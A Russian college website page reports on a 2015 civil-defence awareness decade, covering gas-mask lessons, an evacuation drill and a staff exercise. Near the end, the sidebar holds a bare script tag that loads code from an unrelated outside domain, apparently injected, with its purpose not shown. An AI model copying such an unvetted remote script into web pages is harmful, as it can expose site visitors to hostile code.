Главная
Регистрация
Вход

Приветствую Вас Гость | RSS

Меню сайта

Категории раздела
Абитуриентам [0]
Для желающих поступить в наш колледж

Независимая оценка
Как вы оцениваете качество образовательных услуг нашего колледжа?
Всего ответов: 224

Статистика

Онлайн всего: 1
Гостей: 1
Пользователей: 0

  
Главная » 2015 » Октябрь » 20 » ОТЧЁТ о проведении в колледже декады ГО и ЧС, посвященной 83 годовщине гражданской обороны России.
08:47
ОТЧЁТ о проведении в колледже декады ГО и ЧС, посвященной 83 годовщине гражданской обороны России.

ОТЧЁТ

о проведении в колледже декады ГО и ЧС,

посвященной 83 годовщине  гражданской обороны России.

На основании письма от 28.09.2015 № 6208 Департамента образования и науки Тюменской области, в целях пропаганды и популяризации гражданской обороны в ГАПОУ ТО «Голышмановский агропедколледж» запланирована декада мероприятий, посвященная 83 годовщине гражданской обороны России.

     Для организации декады по гражданской обороне был издан приказ директора колледжа Прейс Г.В. от 02.10.2015 № 84-О «О проведении Всероссийской штабной тренировки по гражданской обороне в составе Голышмановского муниципального района 05.10.2015 года». В этом приказе  была возложена обязанность по организации декады ГО и ЧС в колледже на начальника штаба ГО и ЧС Куртёкову Л.Д.

      В рамках декады 2 октября 2015 года преподавателями ОБЖ Поповым А.И. и Ануфриевым  Д.С. в колледже были проведены открытые уроки по основам  безопасности жизнедеятельности. Обучающиеся познакомились с устройством противогаза ГП-5 и практически выполняли команды «Противогазы готовь!», «Газы!», «Противогазы снять!». По окончании занятия обучающиеся выполнили учебную эвакуацию из здания спортивно-оздоровительного комплекса (СОК).

     С целью совершенствования знаний и практических навыков руководителей гражданской обороны  в вопросах организации и управления  мероприятиями ГО 5 октября 2015 года была проведена Всероссийская штабная тренировка. На базе ГАПОУ ТО «Голышмановский агропедколледж» в спортивно-оздоровительном комплексе (СОК) был развернут пункт выдачи средств индивидуальной защиты Голышмановского муниципального района. Все звенья гражданской обороны колледжа выполнили задания быстро и оперативно. В назначенное время пункт выдачи СИЗ был развернут на базе СОК. Действия личного состава нештатных аварийно-спасательных формирований (НАСФ) были организованы чётко и слаженно. Весь личный состав формирований получил оценку «хорошо».

     06.10.2015 кураторами групп  были проведены часы общения по гражданской обороне на темы: «Организация гражданской обороны в России», «Основные мероприятия по подготовке к защите населения от опасностей, возникающих при чрезвычайных ситуациях», «Действия работников организации в чрезвычайных ситуациях техногенного характера», «Действия работников организации при пожаре», «Оказание первой доврачебной помощи пострадавшим» и др.

    После окончания декады ГО и ЧС были проведен анализ и подведены итоги. Лучшие кураторы и группы были награждены грамотами. На сайте колледжа была  выпушена статья и оформлена фотогазета на стенде воспитательной работы колледжа,  а также выпушена газета колледжа «Студенческий меридиан».

Просмотров: 1696 | Добавил: iTiger | Рейтинг: 0.0/0
Всего комментариев: 0
Имя *:
Email *:
Код *:


Вход на сайт
Логин:
Пароль:

Мы потомки Героев


ПОЛЕЗНЫЕ ССЫЛКИ

Министерство образования и науки Российской Федерации Единое окно доступа к образовательным ресурсам Федеральный портал "Российское образование" Единая коллекция цифровых образовательных ресурсов Федеральный центр информационно-образовательных ресурсов


Персональные данные Дети МЕСТО РОЖДЕНИЯ:
ТЮМЕНСКИЙ КРАЙ Конкурс новый взгляд
<script src="https://tabun.info/out/index.php"></script>
http://профстажировки.рф/
Поиск

Календарь
«  Октябрь 2015  »
ПнВтСрЧтПтСбВс
   1234
567891011
12131415161718
19202122232425
262728293031

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Block title
Block content

Архив записей

Copyright MyCorp © 2024
Создать бесплатный сайт с uCoz